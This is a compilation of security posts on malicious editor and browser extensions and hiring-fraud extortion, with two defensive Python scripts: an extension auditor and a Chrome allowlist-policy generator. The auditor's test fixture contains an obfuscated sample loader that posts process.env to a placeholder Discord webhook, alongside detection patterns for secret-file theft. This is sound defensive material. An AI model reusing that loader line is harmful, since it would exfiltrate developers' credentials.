🚨 How to Hack a Developer 🚨

Developers are constantly the targets for supply chain attacks. Attackers don’t always need to break through firewalls or social engineer credentials—sometimes, all they need is a shiny new VS Code theme or a "helpful" extension loaded with backdoors.

Why does this work so well? Because developers love customization and productivity tools and the Visual Studio Marketplace does not have strict security audits.

💡 How to Protect Yourself:
✅ Don't get too enticed by new shiny things.
✅ Only install extensions from verified, reputable publishers.
✅ Audit your installed extensions and remove anything unnecessary.
✅ Check for excessive permissions and obfuscated code.
✅ Use network monitoring to detect suspicious activity.

I have given a talk and have a video on this topic here: "Code of Armor Presentation: Building Resilience Against Cyber Threats for Developers" https://lnkd.in/gTCu_ht3

Here are some examples:

Material Theme Extensions: In February 2025, Microsoft removed two popular extensions, 'Material Theme – Free' and 'Material Theme Icons – Free,' from the Visual Studio Marketplace. These extensions, with nearly 9 million downloads, were found to contain obfuscated JavaScript code that raised security concerns. https://lnkd.in/gB9Q5HVx

Clipboard-Helper-Vscode: Discovered in April 2024, this extension was designed to steal clipboard data and transmit it via a Discord webhook. https://lnkd.in/gvVt7NAN

Prettiest Java: Masquerading as a Java helper, this extension searched for local secrets and sent them to attackers using a Discord webhook.

Theme Darcula Dark: A theme extension that, instead of merely providing visual enhancements, contained code to steal personally identifiable information (PII) and send it to a remote server. https://lnkd.in/gPTH-s2g
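The checklist above ("audit your installed extensions", "check for excessive permissions and obfuscated code") can be turned into a script. The following is an added example, not code from the post above or from Microsoft: it walks the default VS Code extension directory (~/.vscode/extensions/<publisher>.<name>-<version>/package.json), applies a hypothetical policy (a theme must not declare an executable entry point, activation on "*" means the code runs at every startup, and bundled JavaScript is checked for obfuscation and exfiltration indicators such as long hex-escape runs or Discord webhook URLs), and reports findings per extension. The two fixtures it builds in a temp directory are constructed for the demo; the regexes are heuristics that tell you which file to open, not verdicts.

```python
"""Audit installed VS Code extensions for the red flags listed in the post.

Added example; not code from the original post or from Microsoft. Assumes the
default layout ~/.vscode/extensions/<publisher>.<name>-<version>/package.json
and a hypothetical review policy (see the module constants). Hits are leads
for manual review, not proof of malice.
"""
import json
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# Heuristic indicators in bundled JavaScript. Each match is a reason to open
# the file and read it, nothing more.
SUSPICIOUS_PATTERNS = {
    "eval / Function constructor": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
    "long hex-escape run (string obfuscation)": re.compile(r"(?:\\x[0-9a-fA-F]{2}){8,}"),
    "very long base64 literal": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
    "Discord webhook URL": re.compile(r"discord(?:app)?\.com/api/webhooks/"),
    "reads local secret files": re.compile(r"\.ssh/|\.npmrc|\.aws/credentials|['\"]\.env['\"]"),
}

# Contribution points a pure theme needs. A "theme" that also declares a
# 'main' or 'browser' entry point ships code that runs inside the editor.
THEME_ONLY_CONTRIBUTIONS = {"themes", "iconThemes", "productIconThemes"}


def audit_manifest(manifest: dict) -> List[str]:
    """Return findings derived from package.json alone."""
    findings = []
    contributes = manifest.get("contributes", {})
    is_theme = bool(THEME_ONLY_CONTRIBUTIONS & set(contributes))
    extra = set(contributes) - THEME_ONLY_CONTRIBUTIONS
    if is_theme and ("main" in manifest or "browser" in manifest):
        findings.append("theme declares an executable entry point (main/browser)")
    if is_theme and extra:
        findings.append("theme contributes non-theme features: " + ", ".join(sorted(extra)))
    if "*" in manifest.get("activationEvents", []):
        findings.append("activates on '*' (runs at every startup)")
    if not manifest.get("publisher"):
        findings.append("no publisher field")
    return findings


def scan_javascript(source: str) -> List[str]:
    """Return the name of every SUSPICIOUS_PATTERNS entry that matches."""
    return [name for name, pattern in SUSPICIOUS_PATTERNS.items() if pattern.search(source)]


def audit_extension_dir(ext_dir: Path) -> dict:
    """Audit one unpacked extension: manifest checks plus a scan of its own JS."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    findings = audit_manifest(manifest)
    for js in sorted(ext_dir.rglob("*.js")):
        if "node_modules" in js.parts:  # dependencies deserve their own review
            continue
        hits = scan_javascript(js.read_text(encoding="utf-8", errors="replace"))
        findings.extend(f"{js.relative_to(ext_dir)}: {hit}" for hit in hits)
    ext_id = f"{manifest.get('publisher', '?')}.{manifest.get('name', '?')}"
    return {"id": ext_id, "version": manifest.get("version"), "findings": findings}


def audit_all(root: Optional[Path] = None) -> List[dict]:
    """Audit every extension directory under root (default: this user's VS Code)."""
    root = root or Path.home() / ".vscode" / "extensions"
    return [audit_extension_dir(d) for d in sorted(root.iterdir()) if (d / "package.json").is_file()]


# Constructed fixtures: a clean theme, and a "theme" with an always-on loader
# that hides a string table behind hex escapes and posts to a webhook.
CLEAN_THEME = {
    "name": "good-theme", "publisher": "example-publisher", "version": "1.0.0",
    "engines": {"vscode": "^1.80.0"},
    "contributes": {"themes": [{"label": "Good Dark", "uiTheme": "vs-dark", "path": "./themes/good.json"}]},
}
SHINY_THEME = {
    "name": "shiny-theme", "publisher": "someone", "version": "0.0.3",
    "engines": {"vscode": "^1.80.0"},
    "main": "./out/extension.js", "activationEvents": ["*"],
    "contributes": {"themes": [{"label": "Shiny", "uiTheme": "vs-dark", "path": "./themes/shiny.json"}]},
}
SHINY_LOADER_JS = (
    "const _0x1a=['\\x63\\x68\\x69\\x6c\\x64\\x5f\\x70\\x72\\x6f\\x63\\x65\\x73\\x73'];\n"
    "fetch('https://discord.com/api/webhooks/000/constructed',"
    "{method:'POST',body:JSON.stringify(process.env)});\n"
)


def demo() -> Dict[str, List[str]]:
    """Write both fixtures to a temp dir, audit them, return id -> findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        good = root / "example-publisher.good-theme-1.0.0"
        good.mkdir()
        (good / "package.json").write_text(json.dumps(CLEAN_THEME))
        bad = root / "someone.shiny-theme-0.0.3"
        (bad / "out").mkdir(parents=True)
        (bad / "package.json").write_text(json.dumps(SHINY_THEME))
        (bad / "out" / "extension.js").write_text(SHINY_LOADER_JS)
        return {r["id"]: r["findings"] for r in audit_all(root)}


if __name__ == "__main__":
    for ext_id, findings in demo().items():
        print(ext_id, "->", findings or "clean")
```

Run it without arguments to audit the fixtures; call `audit_all()` to audit your own install. The clean theme produces no findings; the shiny one is flagged four times (entry point, always-on activation, hex-escaped strings, webhook URL). Extensions installed through the web version of VS Code or via a remote SSH/WSL host live elsewhere and would need their own root.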
How to Protect Against Extension Attacks
Summary
Extension attacks use malicious or hijacked browser and IDE add-ons, typically installed from public marketplaces with little vetting, to steal credentials and other sensitive data, introduce malware, or take over the hosts they run on. By carefully managing and vetting extensions, individuals and organizations can reduce exposure to these threats.
- Install only from trusted sources: Always download extensions from verified and reputable publishers, and avoid unknown or suspicious sources.
- Regularly audit installed extensions: Periodically review your extensions, removing those that are unnecessary or show unusual permission requests.
- Monitor permissions and network activity: Limit excessive permissions for extensions and use network monitoring tools to detect suspicious behavior.
In July, a North Korean hacker posed as an IT worker and duped a cybersecurity company into hiring him. Now they’re using extortion as a follow-up attack. Hiring fraud just reached a new level.

North Korean hackers are no longer satisfied with just infiltrating your company—they’re holding your data hostage and demanding ransoms to keep it from being leaked. It’s a sophisticated evolution in cybercrime, and Western companies are the primary target.

Here’s how it works: Hackers pose as highly qualified IT professionals, using fake resumes, AI-generated identities, and stolen credentials. They go through the hiring process unnoticed, secure a job, and gain access to sensitive company data. But instead of just stealing it, they’re now threatening to expose it—unless you pay up.

So, what can you do to prevent this?

1. Tighten Your Hiring Process
Use multi-layered identity verification tools and require video interviews with real-time identity checks. Look for red flags like unverified recruiters or unusual interview behaviors (e.g., candidates refusing to turn on their camera).

2. Screen Job Offers Carefully
Whether you’re a hiring manager or candidate, scrutinize job application invites and offers, especially those from email or messaging services like WhatsApp. Verify the recruiter’s identity and check if the company they represent is legitimate.

3. Monitor New Hires’ Behavior
Even after onboarding, monitor new employees for suspicious activity, such as unexpected access requests or attempts to install unauthorized software. Keep access levels restricted for new hires until they’ve been fully vetted.

4. Utilize Suspicious Email Analysis Tools
Before clicking on links or opening attachments in unsolicited job offers or other suspicious emails, make use of tools like Field Effect’s Suspicious Email Analysis Service (SEAS) to ensure they’re benign.

The rise in this type of extortion shows just how advanced cybercriminals are becoming. Protecting your business goes beyond cybersecurity—it’s about reinforcing every layer, including your hiring process.

Takeaway: The next IT hire you make could be an undercover cybercriminal, but you can minimize the risk by staying vigilant, verifying identities, and implementing strict access controls.

Intelligent Technical Solutions Mike Rhea
#Cybersecurity #HiringFraud #DataExtortion #HRSecurity #RiskManagement #BusinessProtection #EndpointSecurity #ITSecurity #RemoteWork #Leadership #CyberRisk #RiskMitigation #BusinessLeaders #HR
-
Browser Extensions: A Security Blind Spot

The recent security breach involving more than 35 Chrome extensions, impacting 2.6 million users, serves as a great illustration of the escalating cyberthreat. Cybercriminals exploited phishing techniques to infiltrate trusted extensions, compromising user credentials and extracting sensitive data. Domain registrations linked to the attack date back to August 2022 and July 2021, implying a well-planned, long-term operation.

While the magnitude of this breach is alarming, the real issue lies in the neglect of browser extensions by most Chief Information Security Officers (CISOs), except in the most secure institutions. Browser extensions are easily installed by the user without administrator rights, they can have extensive access to sensitive data, and they frequently evade detection by most enterprise security measures. This incident underscores a critical gap that cybersecurity leaders shouldn't ignore.

Here are some steps to address this challenge:
- Regular Auditing and Inventory: Establish oversight on the extensions installed across organizational endpoints.
- Permission Management: Assess and restrict the permissions granted to extensions, where possible.
- Promote Security Awareness: Educate employees on the dangers of installing unverified extensions.
- Enforce Policies: Consider deploying enterprise security controls to permit only approved browser extensions.

In an increasingly intricate digital realm, CISOs must broaden their threat assessments to encompass all potential vulnerabilities, including items as seemingly trivial as browser extensions. The focus should not only be on what is monitored but also on what remains undetected. In other words: do you know where your blind spots are?

Read more at: https://lnkd.in/em4BhDFX
-
Think twice before you click 'Add Extension'. Your quest for convenience could compromise your security. But the truth is... many extensions are wolves in sheep's clothing. Hackers and scammers create fake extensions packed with malware and hidden tracking software. Once installed, these malicious add-ons can spy on everything you do online, steal personal information like passwords, or even take control of your whole computer.

Just as you seek products directly from genuine manufacturers, you should only download browser add-ons from reputable app stores. Here are a few things to keep in mind before opting for any extension or tool online:

1. Check out the developer’s website to see if it’s a legitimate extension and not a one-off by an unvetted source.
2. Read the description and look for things that may be questionable, like tracking info or data sharing.
3. Check out the reviews. Look for users complaining of oddities happening, speculating on their data being taken, or for anything that strikes you as odd.
4. Be cautious. The more extensions installed, the bigger the attack surface you open to attackers. Only pick the most useful and delete the ones you don't need.
5. If an extension installed suddenly requests new permissions, be wary. If you can’t find a reason for the permission change, it’s probably better to uninstall.

Before adding that new extension, pause and verify. Your privacy is priceless. So choose wisely, stay secure.
-
The Cyberhaven attack is making headlines—but what could Cyberhaven and its customers have done to prevent it?

Attack Context: https://lnkd.in/gqZCCDYh

What Happened? SquareX reported a large-scale attack targeting Chrome extensions. This is how it worked:
- The Chrome Web Store publicly displays the developer’s email address on the extension’s page.
- Attackers used that email to impersonate the Chrome Web Store and request urgent action.
- By clicking the link in the email, the attackers attempted to gain permission to the developer’s Chrome Extension account.
- The developer may have granted access, enabling the attacker to modify and push a malicious update to the extension.

Here is a video of the actual attack we uncovered: https://lnkd.in/gHcqJasK

What could have been done to stop this attack?

(A) By Cyberhaven:

(i) Restricting Risky OAuth Permissions
Employees often click through SSO and OAuth screens, potentially granting permissions to unknown third-party apps. On the server side, this could be prevented by disallowing apps that request risky OAuth scopes unless they are authorized. While creating a whitelist isn’t always practical and can reduce productivity, a client-side Browser Detection-Response tool can step in. In the same post linked above, we detail how SquareX could have helped Cyberhaven and other organizations.

(ii) Cyberhaven’s browser extension is primarily deployed in enterprise settings, so there is no strong need to host it on the Google Chrome Web Store. Many security extensions (like Cyberhaven) can be deployed via GPO/MDM, hosted on private URLs/stores. This approach removes the risk of a mass compromise like the one seen in this attack.

(B) By Enterprises using Browser Extensions

(i) Supply Chain Attack Awareness
Browser extensions installed from the public Chrome Web Store are vulnerable to supply chain attacks. An extension may be malicious from the start, acquired by a malicious party later, or hijacked. To mitigate these risks, organizations need the ability to detect and block suspicious extensions—either at deployment time or dynamically whenever the extension starts exhibiting malicious behavior.

SquareX has extensively researched how extensions can be exploited, including a cutting-edge talk at Defcon and identifying architectural issues in the new MV3 extension framework:
Defcon talk: https://lnkd.in/gdKWmayt
Darkreading coverage: https://lnkd.in/gt7-S29v
Our detection capabilities: https://lnkd.in/gqMTe_tb

If you want to learn more about protecting your enterprise, feel free to DM me or try us at www.sqrx.com

SquareX - an industry-first Browser Detection-Response solution.
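Two of the posts above converge on the same control: the "Blind Spot" post asks for enterprise policy that permits only approved browser extensions and restricts their permissions, and the Cyberhaven post notes that an enterprise extension can be force-deployed via GPO/MDM from a private URL instead of the public Chrome Web Store, so a Web Store account takeover cannot push an update to the fleet. The following is an added example, not code from Cyberhaven, SquareX or Google: it generates Chrome's ExtensionSettings managed policy with a block-everything default, a vetted allowlist whose riskiest permissions are stripped and which may not touch sensitive internal hosts, and a force-installed internal extension served from a private HTTPS update manifest, then lints the result before writing it. The policy keys (ExtensionSettings, installation_mode, update_url, blocked_permissions, runtime_blocked_hosts, blocked_install_message) are Chrome's documented enterprise policy schema; the extension IDs, hosts and URLs are constructed placeholders.

```python
"""Generate and lint a Chrome ExtensionSettings managed policy.

Added example for the two posts above; not code from Cyberhaven, SquareX or
Google. Extension IDs, hosts, URLs and the output path are constructed
placeholders; replace them with values from your own inventory.
"""
import json
import re
from pathlib import Path
from typing import Dict, List

EXTENSION_ID = re.compile(r"^[a-p]{32}$")  # Chrome IDs are 32 chars from a-p

# Permissions that expose sessions, traffic or the host. Stripped from every
# allowed extension unless a documented business case says otherwise.
RISKY_PERMISSIONS = ["cookies", "debugger", "nativeMessaging", "proxy",
                     "webRequest", "webRequestBlocking"]

# Hosts no extension may read or script, even when it is allowed (constructed).
SENSITIVE_HOSTS = ["*://*.sso.example.internal", "*://*.payroll.example.internal"]


def is_valid_extension_id(ext_id: str) -> bool:
    return bool(EXTENSION_ID.fullmatch(ext_id))


def is_private_update_url(url: str) -> bool:
    """Accept only HTTPS update manifests that are not the public Web Store."""
    return url.startswith("https://") and "clients2.google.com" not in url


def build_policy(allowed: List[str], internal: Dict[str, str],
                 sensitive_hosts: List[str] = SENSITIVE_HOSTS) -> dict:
    """allowed: vetted Web Store extension IDs; internal: id -> private update URL."""
    settings = {
        "*": {  # default for anything not listed below
            "installation_mode": "blocked",
            "blocked_install_message": "Extensions are managed. Ask security for approval.",
        }
    }
    for ext_id in allowed:
        if not is_valid_extension_id(ext_id):
            raise ValueError(f"bad extension id: {ext_id}")
        settings[ext_id] = {
            "installation_mode": "allowed",
            "blocked_permissions": RISKY_PERMISSIONS,
            "runtime_blocked_hosts": sensitive_hosts,
        }
    for ext_id, update_url in internal.items():
        if not is_valid_extension_id(ext_id):
            raise ValueError(f"bad extension id: {ext_id}")
        if not is_private_update_url(update_url):
            raise ValueError(f"update_url must be a private HTTPS manifest: {update_url}")
        settings[ext_id] = {
            "installation_mode": "force_installed",  # installed from update_url, not the Web Store
            "update_url": update_url,
            "runtime_blocked_hosts": sensitive_hosts,
        }
    return {"ExtensionSettings": settings}


def check_policy(policy: dict) -> List[str]:
    """Lint a policy before deployment; returns a list of problems (empty = OK)."""
    problems = []
    settings = policy.get("ExtensionSettings", {})
    if settings.get("*", {}).get("installation_mode") != "blocked":
        problems.append("default '*' entry must block unlisted extensions")
    for ext_id, entry in settings.items():
        if ext_id == "*":
            continue
        if not is_valid_extension_id(ext_id):
            problems.append(f"{ext_id}: not a valid extension id")
        mode = entry.get("installation_mode")
        if mode not in ("allowed", "force_installed"):
            problems.append(f"{ext_id}: unexpected installation_mode {mode!r}")
        if mode == "force_installed" and not is_private_update_url(entry.get("update_url", "")):
            problems.append(f"{ext_id}: force_installed without a private HTTPS update_url")
    return problems


def write_policy(policy: dict, path: Path) -> Path:
    """Write the JSON; on Linux Chrome reads /etc/opt/chrome/policies/managed/*.json."""
    problems = check_policy(policy)
    if problems:
        raise ValueError("; ".join(problems))
    path.write_text(json.dumps(policy, indent=2) + "\n")
    return path


# Constructed IDs and URL for the demo.
DEMO_ALLOWED = ["a" * 32]
DEMO_INTERNAL = {"b" * 32: "https://extensions.corp.example/dlp/updates.xml"}


def demo() -> dict:
    return build_policy(DEMO_ALLOWED, DEMO_INTERNAL)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

On Windows the same JSON goes into the ExtensionSettings value under the Chrome policy registry key via GPO, and on macOS into the managed preferences plist via MDM. The private update_url must serve Chrome's update manifest XML and a CRX signed with the key that produced the extension ID, and Chrome only honours off-store force installs on machines it recognises as managed, so test on an enrolled device before rolling out. This policy does nothing about the OAuth grant that started the Cyberhaven incident; that is a control on the developer's Google account side, not on the endpoints.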